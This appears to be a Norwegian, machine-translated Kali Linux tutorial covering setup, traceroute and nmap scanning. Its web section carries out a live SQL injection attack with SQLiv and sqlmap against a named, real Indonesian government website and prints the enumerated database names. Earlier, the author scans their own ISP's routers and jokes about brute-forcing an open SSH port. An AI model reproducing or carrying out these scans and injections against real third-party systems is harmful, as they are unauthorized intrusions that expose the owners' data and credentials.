Kali Linux -opplæring

Kali Linux Tutorial



Hvis du er en ekspert eller i det minste kjent med Linux, kommandoer og miljø, nettopp installert Kali Linux på maskinen din, ønsket å bli en Master i Kali Linux eller en etisk hacker, er du på rett sted. I denne artikkelen vil jeg dekke en Kali Linux -opplæring for Linux -brukere som ikke allerede er kjent med Kali, og komme i gang med noen av de grunnleggende teknikkene som brukes for hacking og sikkerhetstesting mens du bruker Kali.

Hva er Kali Linux?

Kali Linux, ( første gang utgitt 13. mars 2013 ) som formelt ble kjent som BackTrack, utviklet av sikkerhetsfirmaet Offensive Security, er en rettsmedisinsk og sikkerhetsfokusert distribusjon basert på Debians Testing-gren. Kali Linux er designet med tanke på penetrasjonstesting, datagjenoppretting og trusseloppdagelse. Prosjektet gikk over til en rullende utgivelsesmodell tidligere i år i et forsøk på å tilby mer oppdaterte sikkerhetstjenester til distribusjonens brukere. Kali Linux er gratis, og vil alltid være det. Den har 600+ penetrasjonstestverktøy inkludert.







Hvorfor Kali Linux? Er det riktig for deg?

Kali Linux har fått mye popularitet i det siste. Og det er en grunn bak det. Hacking er tilbake som det kuleste i populærkulturen, og dette kan tilskrives TV-serien Mr. Robot betydelig. Mr. Robots popularitet hjalp Kali Linux med å få nye brukere. Folk med knapt kjennskap til Linux eller noe relatert til datasikkerhet prøver nå å bruke Kali som sin viktigste Linux -distribusjon.



Vår mest avanserte penetrasjonstestdistribusjon noensinne. - Kali Linux -utviklere. (Det er skrevet på hovedsiden til Kali.org helt øverst på siden.) Hva får du fra denne uttalelsen? Merker du dette: APTD (Advanced Penetration Testing Distribution)? Det er ingen term hacking her bokstavelig talt. Kali Linux er det samme som andre Linux -distribusjoner. Enkelt sagt, det er en Linux-distribusjon fullpakket med sikkerhetsrelaterte verktøy og rettet mot nettverks- og datasikkerhetseksperter. Imidlertid fokuserer bruken av Kali Linux bare på sikkerhet og rettsmedisin.



En Linux -distribusjon er ikke annet enn en bunt som inneholder Linux -kjernen, et sett med kjerneverktøy og programmer og noen standardinnstillinger. Så, Kali Linux tilbyr ikke noe unikt i den forstand, de fleste av de medfølgende verktøyene kan installeres på hvilken som helst Linux -distribusjon.





Kali Linux er spesielt tilpasset kravene til profesjonell penetrasjonstesting og sikkerhetsrevisjon. Den er rettet mot en bestemt delmengde av Linux -brukere. Pentestere, hackere, etc. Det er ikke en anbefalt distribusjon hvis du forventer Kali for Linux-skrivebord for generell bruk for utvikling, webdesign, spill, kontor, etc. Kali kan gi deg noen utfordringer, selv om du er en erfaren Linux-bruker .

Ting å gjøre etter å ha installert KALI LINUX

Etter å ha installert Kali Linux, kan du lure på hva du skal gjøre videre med dette, ikke sant? Alle står overfor dette problemet, ikke bekymre deg.



TRINN 1: SETT OPP REPOSITORIET

For det første kan du allerede vite dette, men det er avgjørende å sette oppbevaringsstedet riktig. Som jeg sa, er Kali Linux rullende utgivelsesmodell i et forsøk på å tilby mer oppdaterte sikkerhetsverktøy til distribusjonens brukere. Vanligvis, hvis du har Kali Linux nyinstallert, refererer depotet til mediene du bruker til å installere. For å fikse dette må du endre depotet til det offisielle Kali Linux -depotet. Filen som kreves er plassert under /etc/apt/sources.list . Åpne filen med leafpad -tekstredigerer og erstatt standardlageret til dette offisielle Kali Rolling -depotet:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

TRINN 2: OPPDATER OG OPPGRADERE KALI -LINUXEN DIN

Etter den oppdateringen og oppgrader systemet, synkroniserer du Kali Linux til den nyeste versjonen. For å gjøre det, åpne terminalen, og skriv:

apt update -y && apt upgrade -y && apt dist-upgrade 

Kommandoen apt update laster ned og henter pakken, viser informasjon fra depotene og oppdaterer dem for å få informasjon om de nyeste versjonene av pakker og deres avhengigheter.

Den passende oppgraderingskommandoen laster ned og installerer nyere versjon av pakkene med installerte Kali Linux -pakker så lenge den ikke har feil på avhengigheter.

Den passende dist-oppgraderingen vil oppdatere alle pakker til den nyeste tilgjengelige versjonen uansett. Og også installer og fjern avhengigheter etter behov (installer avhengigheter for å tilfredsstille pakker, åpenbart, men også fjern avhengigheter som ble foreldreløse hvis en pakke som ble oppdatert ikke lenger trengte avhengigheten.

GRUNNLEGGENDE PENETRASJONSTESTKONSEPT MED KALI LINUX

Etter at du har utført disse trinnene, er det tre hoved ting du kan gjøre med Kali Linux basert på det målrettede systemet, inkludert:

  1. Trådløs nettverkshacking - Wifi -hacking, Phising, ARP -forgiftning, etc.
  2. Webapps hacking -SQL-injeksjon, Forfalskning på tvers av nettsteder (CSRF), Web Phising, etc.
  3. Enhetshacking - Utnytt målmaskinen for å få kontroll over den.

Jeg inkluderer ikke IoT -hacking, det betyr ikke at Kali Linux ikke har noen evne til det formålet. Men bokstavelig talt kan det også tilhøre Device Hacking. Siden enheten har fysisk utseende og form. I denne opplæringen dekket jeg den grunnleggende kunnskapen om dem. Siden Kali Linux er enormt, passer det ikke i en artikkel!

Du må også kjenne til penetrasjonstestsyklusen eller prosedyren. De er:

  1. Rekognosering - Informasjonssamling
  2. Skanning
  3. Operasjon
  4. Etter utnyttelse

TRÅDLØS NETTVERKSHACKING MED KALI LINUX

Når det gjelder hacking av trådløst nettverk, kan offeret variere. Fordi trådløse nettverk består av flere ting, for eksempel ISP (Internett -leverandør), ruteren og kameratene (modem, hub, switch osv.) Og klientene (brukere, CCTV, ekstern datamaskin osv.). De har også sårbare muligheter.

Internett er en stor og kompleks samling av nettverksmaskinvare, koblet sammen av gateways. Det er viktig å spore ruten pakkene dine følger for å vite hvordan du når et bestemt vertsnavn eller en mål -IP -adresse.

Kali Linux har et innebygd verktøy som heter Traceroute. Traceroute bruker IP -protokolltiden til å leve feltet og prøver å fremkalle et ICMP TIME_EXCEEDED -svar fra hver gateway langs banen til noen vert. Traceroute prøver å spore ruten en IP -pakke ville følge til noen internettverter ved å starte sondepakker med en liten TTL (tid å leve) og deretter lytte etter en ICMP -tid som overskred svaret fra en gateway. Jeg vil gi deg et eksempel på hvordan du sporer en ISP -ruter som ble brukt til å håndtere tilkoblingen vår ved hjelp av Traceroute.

1. Anerkjennelse

Informasjonsinnsamling er den viktigste hoppestarten, ikke gå glipp av dette trinnet. I dette trinnet er vår hensikt å få så mye som mulig nyttig informasjon vi kan få, og deretter brukes denne informasjonen til videre trinn.

Først åpner du en terminal og skriver inn denne kommandoen for å begynne å spore veien til nettstedet, i dette tilfellet satte jeg nettstedet til google.com.

traceroute google.com 

Traceroute Skjermbilde

2. Skanning

Når vi starter kommandoene, vil den vise hvor pakken vår går i rekkefølge. Som du kan se ovenfor, fikk jeg 3 hopp, hvorav en av dem er min ISP -server. Den første IP -en på listen er ruteren min, som fungerer som en gateway. Og de to neste av dem tilhører min ISP. La oss nå sjekke tjenesten de kjører ved hjelp av Nmap. Så målene vi skal skanne er 10.152.192.1 og 10.13.223.102 . I terminalen kjørte jeg følgende kommando:

nmap -v -sS [IP Target] -Pn 

La oss bryte ned kommandoens argument:

-v = Aktiver verbosity -modus

-sS = Bruk TCP SYN -skanneteknikk

-Pn = Behandle alle verter som online -hopp over vertsoppdagelse

Og her er resultatet vi fikk.

nmap skjermbilde 2

Dessverre er alle porter på 10.152.192.1 er filtrert, betyr det at alle innkommende TCP -tilkoblinger er blokkert av IDS eller brannmur på denne IP -adressen. La oss ta en ny skanning til det andre målet.

nmap skjermbilde 1

3. Drift

I denne prosedyren har jeg ikke til hensikt å utføre den virkelige utnyttelsen, i stedet viser jeg deg hvordan. Basert på Nmap -skanneresultatet ovenfor vet vi at denne IP -en har SSH -server som kjører på port 22, og den er åpen. Det er åpent for å bli brutalt tvunget, haha! Vi fant hullet, denne SSH -serveren er det mulige hullet vi kan prøve å få tilgang til. Det er flere verktøy i Kali Linux som støtter bruteforce eller ordbokangrep mot SSH -protokollen. Den mest populære og kraftfulle er Hydra.

Ok, det var en grunnleggende prosedyre som utførte en penetrasjonstest mot en målrettet server, som i vårt eksempel her er min ISP -server.

WEBPAPPER HACKING MED KALI LINUX

Faktisk, hvis du brenner for dette, kan du konfigurere hackingsmiljøet ditt ved å installere DWVA (Damn Vulnerable Web App) i Kali Linux. Det er en PHP/MySQL webapplikasjon som har en haug med sårbare hull. Hovedmålene er å være et hjelpemiddel for sikkerhetspersonell til å teste sine ferdigheter og verktøy i et juridisk miljø, og hjelpe webutviklere bedre å forstå prosessene for å sikre webapplikasjoner. Du kan få DWVA gratis på Github her: https://github.com/ethicalhack3r/DVWA.

For nå vil jeg vise deg hvordan du gjør Web Apps Hacking på et ekte nettsted. Men lov meg at det er begrenset til utdanningsformål. Vi vil simulere et ekte angrep på ekte nettsted ved hjelp av SQL -injeksjon.

Forutsetning

Verktøy dekket:

-Whatweb (forhåndsinstallert)

-Nmap (forhåndsinstallert)

- SQLiv (installer manuelt)

-SQLMap (forhåndsinstallert)

Vi trenger et ekstra verktøy som er tilgjengelig på Github her: https://github.com/Hadesy2k/sqliv, installer det først til vårt Kali Linux. Dette verktøyet heter SQLiv som er i stand til å gjøre målrettet skanning ved å tilby et bestemt domene (med gjennomsøking). Skriv inn terminalen:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Mål: www.trenggalekkab.go.id

1. Anerkjennelse

Samle så mye nyttig informasjon som vi kan få. Vi kan åpne nettsiden og oppdage hvilken applikasjon som kjører på dette nettstedet. For det første, la oss sjekke hva slags nettsted det er. Vi kommer til å bruke whatweb for å gjøre det.

whatweb www.trenggalekkab.go.id 

Hvilket nettskjermbilde

Som du kan se resultatet ovenfor, ligger målet i Indonesia. Det går Apache v2.2.27 på sin webserver og har også PHP v5.4.31 , den har en IP -adresse 103.247.21.142 . Ok, noter det. Du må kanskje besøke nettsiden, lete etter filen eller siden som er konstruert, URL -parametere eller til og med påloggingsskjema. For nå trenger vi den IP -adressen for det neste trinnet som skannes.

2. Skanning

Som som før bruker vi Nmap igjen for å skanne hvilke porter og tjenester som kjører på målet.

nmap -v -sS 103.247.21.142 

Og her er resultatet vi fikk:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Det er haug med åpne porter som håndterer hver tjeneste på målet, men den som ser iøynefallende ut er at mysql-tjenesten på port 3306. Det er angitt at dette nettstedet bruker mysql for å administrere informasjonen sin i databaser. Deretter lurer jeg på om det er noen sårbarheter ved SQL -injeksjon på dette nettstedet. Så jeg skanner nettstedet igjen ved hjelp av SQLiv vi nettopp har installert. Jeg skrev kommandoen:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Vi fant to mulige SQL -sårbare URL -er på dette nettstedet. Legg merke til disse nettadressene.

3. Drift

Ok, vi har SQL -sårbare nettadresser og er klare for utførelse. For å gjøre det bruker vi SQLMap. Syntaksen er:

sqlmap [Vulnerable URL] --dbs 

Kommandoen skal se slik ut:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argumentet –dbs er å fortelle SQLMap om å skaffe måldatabaser. Her er utgangen vi fikk:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap fant 2 databaser, men bare én blant dem som inneholder sensitive data, for eksempel en admin -legitimasjonskonto. Det er på trengkab_trg. Etter at vi har funnet databasene, er det enda et trinn vi bør gjøre. Det vil si å finne tabellene og kolonnene, og det siste trinnet er å dumpe dataene. Jeg vil ikke vise deg hvordan du bruker dette målet her i denne delen. Du kjenner i hvert fall den grunnleggende ideen om angrepssyklusen, og bruker noen verktøy.

HACKING AV ENHETEN

I en fremtidig artikkel på dette nettstedet vil vi dekke hacking av enheter, følg med. Som en forhåndsvarsel vil du sørge for at du kjenner noen Python for dette.